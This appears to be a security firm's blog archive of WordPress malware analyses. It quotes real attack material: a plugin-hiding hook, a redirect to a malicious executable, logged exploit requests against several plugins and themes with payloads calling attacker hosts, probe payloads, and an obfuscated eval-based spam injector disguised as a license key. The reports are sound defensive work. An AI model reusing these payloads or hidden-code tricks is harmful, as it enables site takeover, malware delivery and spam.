Category: WordPress Security

WP Plugin Hider

One of our analysts recently found an interesting injection that has been found on WordPress installations. Installed by hacker, it is used to hide a malicious plugin. that was installed by the hacker. In this instance the plugin was generically named “wordpressplugin”.

function hide_plugin() {
 global $wp_list_table;
 $hide_array = array('wordpressplugin/plugin.php');
 $my_plugins = $wp_list_table->items;
 foreach ($my_plugins as $key => $val) {
if (in_array($key,$hide_array)) {
  unset($wp_list_table->items[$key]);
}
 }
}
add_action('pre_current_active_plugins', 'hide_plugin');

This code helps the malicious plugin go unnoticed by the website owner, as it will not show within the normal plugins screen of the WordPress admin interface (previously we have seen similar behavior in “fake” plugins). In order to do this, they simply add a function that goes through and unsets the specific plugin they have used in the code. This function is then run every time before the active plugins are shown in the WordPress admin interface.

It’s recommended that you periodically audit and remove inactive plugins from your wp-content/plugins/ directory and do not solely rely on the wp-admin plugin page; it can be manipulated as seen here.

This type of code can also be used legitimately. Some developers do not want all their plugins shown on the plugins page of WordPress admin interface so that they can add similar code to prevent the appearance of the plugin.

Apr 23, 2019 by Luke Leal

Defunct Malware Can Cause Problems Too

Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress admin interface.

We found the culprit in the functions.php file of the active theme.

if ( get_current_user_id() != '1130') {
   header("Location: hxxps://photoscape[.]ch/Setup.exe");
}

This code checks the Id of the current WordPress user and redirects them (if their Id is not 1130) to download a malicious Setup.exe file.

The functions.php file wasn’t the only infected file. We also removed many backdoors and a script that hid rogue admin users in the User’s list in the WordPress dashboard.

This campaign was active about a year ago. Since then the domain name has expired and the site owners spotted and deleted the rogue admin user with Id 1130. However, the annoying redirect persisted and even caused blacklisting of the site by some antiviruses, so the site owners requested us to clean their site.

Apr 18, 2019 by Harshad Mane

Social Warfare Vulnerability Probes

After a recent disclosure of the Social Warfare plugin vulnerability, we’ve seen massive attacks that inject malicious JavaScripts into the plugin options.

The vulnerability has been patched in version 3.5.3 of the plugin, so not all sites with that plugin are now vulnerable. To find actually vulnerable sites, hackers scan the Internet and probe the sites. However, instead of using the file with code that actually changes the settings, they just specify a file with a PHP code that returns a predefined text for vulnerable sites.

Here are some of the URLs of such probe files detected by our firewall:

<pre>hxxp://<strong>thehuglaw[.]com</strong>/cache/wq.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp2.txthxxp://<strong>www.fdqyj[.]com</strong>/lang/wp3.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/tresz.txthxxp://<strong>kidsinthehouse[.]com</strong>/all-backup/libraries/share/fonts/551.txthxxps://<strong>gist.githubusercontent.com/kolzdnoy71</strong>/ef026d1b2587371fdc6b28a9a21249dd/raw/628d8b376d2122580d6fcbc63c41ea9778473b8f/gistfile1.txt...</pre>

They have very simple PHP code inside <pre> tags. For example:

<pre>print(7457737+736723);</pre>

Or

<pre>system('echo dfdffg34dfg')</pre>

Some of such files are hosted on compromised third-party sites and, at this point, some of them have already been removed.

Hacked sites are not the only option used by the attackers. We’ve seen them using Pastebin links (Pastebin removes them after abuse reports). Another option that you can see in the list above, is Github, and specifically their Gist service.

In case of the above Gist link, the user who created it (kolzdnoy71) has joined GitHub just on March 27, 2019.

Mar 29, 2019 by Denis Sinegubko

Super Amazon Banners plugin gone rogue

During a recent investigation we found the plugin Super Amazon Banners to be serving malware/spam via the domain seoranker[.]info. We suspect that the domain expired and was registered by somebody else who is using it to serve the malware now.

The plugin causes this javascript to try and load a popup (popupHtml) with many spam links to external sites. Also appears to be causing loading issues and some pages refuse to load at all:

(function() {'use strict'; if (window['shbNetLoaded']) return;window['shbNetLoaded'] = true;var popupHtml =

Here is a screenshot of the code the plugin is trying to load:

The issue was reported to WordPress and the plugin can no longer be downloaded, it was closed. We recommend removing the plugin from your WordPress site if you are using it.

Mar 26, 2019 by Krasimir Konov

Multi-Vector Attack in Server Logs

We recently noticed an increase on suspicious requests in our logs which reveal a planned attack against the Social Warfare plugin. Bad actors added this brand new exploit to an existing campaign, which includes other vulnerable plugins and themes, to inject malicious scripts.


Plugins and themes under attack

Some of the Payloads Used by Bots

WordPress GDPR Compliance

145.239.54.77 - action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22siteurl%22%2C%22value%22+%3A%22https%3A%2F%2Fverybeatifulpear .com%2Fjava.js%3Ft%3D2%26%22%7D&security= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Newspaper WP Theme

31.208.43.209 - action=td_ajax_update_panel&wp_option%5Bhome%5D=https%3A%2F%2Fredrentalservice .com [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Social Warfare Plugin

91.134.215.233 - - [Date] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=hxxp://109.234 .34 .22/mv.txt HTTP/1.1"

Smart Google Code Inserter

1.208.43.209 - action=savegooglecode&sgcgoogleanalytic=%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+...skipped...+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E&sgcwebtools= [Date] "POST /wp-admin/admin-ajax.php HTTP/1.1"code redirects to hxxps://redrentalservice[.]com/?t4

Education WP Theme

34.194.221.173 - action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=X%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+97%2C+32%2C+61%2C+32%2C+34%2C+104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%2C+114%2C+101%2C+100%2C+114%2C+101%2C+110%2C+116%2C+97%2C+108%2C+115%2C+101%2C+114%2C+118%2C+105%2C+99%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+63%2C+116%2C+52%2C...skipped...97%2C+59%2C+32%2C+119%2C+105%2C+110%2C+100%2C+111%2C+119%2C+46%2C+108%2C+111%2C+99%2C+97%2C+116%2C+105%2C+111%2C+110%2C+46%2C+104%2C+114%2C+101%2C+102%2C+61%2C+97%2C+59%29%29%3B%3C%2Fscript%3E%3Cscript%3E "POST /wp-admin/admin-ajax.php

Malicious Domains and IPs:

IPs:

31.208.43.20991.134.215.23334.194.221.173128.199.114.0162.243.1.231145.239.54.77185.136.85.47222.73.242.180109.234.34.22

URLs:

hxxps://redrentalservice[.]com/tpn1.jshxxp://raiserate[.]com/mv.txthxxp://109.234 .34 .22/mv.txthxxps://verybeatifulpear[.]comhxxps://blueeyeswebsite[.]comhxxp://r-y-p[.]org/options.txthxxps://teutorrent.com/wp-includes/js/javascript-mini.js
Mar 25, 2019 by John Castro

Spam Injector Disguised as a License Key

A client reported some weird spam URLs injected on their WordPress website and after an investigation, it turned out that the hacker was hiding the encoded spam injector malware in the following theme file:

./wp-content/themes/toolbox/functions.php

The hacker formatted the encoded injector to look like a theme’s license key trying to distract eyes from suspecting this code and finding the malware:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
    // Your personal token key #00118
    $token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
    if( $token = json_decode( base64_decode( $token ), true ) ) {
        $token['license'] = $token['license']( $token['account'], $token['theme'] );
        $token['license']( $token['update'] );
    }
}
add_action( 'wp_footer', 'theme_personal_token' );

The injected code contained a few layers of encoding to further obfuscate it from detection, but we can begin by decoding the base64-encoded text within the $token variable:

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

As shown by the above decoded content, we can see that the hacker is still trying to disguise the malware as a type of licensing key for a theme.

This conditional if statement also checked for the user agents, showing the spam URLs to any and all other user agents/search engines except the ones shown below. It tried to hide it from some web-based link-analyzing tools as it may be cached by such tools and the client may be notified:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

The final decoded payload with hidden links as it would appear within the HTML source:

<a href="hps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a><a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a><a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a><a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

The links are hard-coded inside this malware, but on different sites they may be different. The domains of the spammy sites remain mostly the same though.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jan 7, 2019 by Moe Obaid

Side Effects of the Site_url Hack

We\'ve been cleaning many sites infected by the so-called site_url hack–the result of the WP GDPR Compliance plugin vulnerability. The sites are broken because their static resource links point to some third party site. However, this is not the only issue.

If a user starts to make changes in their WordPress settings or some plugin regularly updates them, chances are the changes will be affected by the new value of the site_url option. In such cases, you’ll have to search the whole WordPress database (or at least the wp_options table) and files on the server for the rogue site_url value in order to revert the changes.****

For example, this is what your site’s .htaccess file may end up looking like after this hack:

# MediaAce Rules - Hotlink protection
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} !/wp-content/plugins/media-ace/assets/hotlink-placeholder.png$
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?wtools.io/code/raw/so? [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?facebook\.com [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?google\.*$/.* [NC]
RewriteCond %{HTTP_REFERER} !^(http(s)?://)?(www\.)?pinterest\.*$/.* [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ hxxp://wtools[.]io/code/raw/so?/wp-content/plugins/media-ace/assets/hotlink-placeholder.png [NC,R,L]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /code/raw/so/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /code/raw/so/index.php [L]
</IfModule>

# END WordPress

As you can guess, in this case, hackers changed the site_url to hxxp://wtools[.]io/code/raw/so?, so the media-ace plugin and main WordPress rewrite rules were corrupted.

Nov 20, 2018 by Denis Sinegubko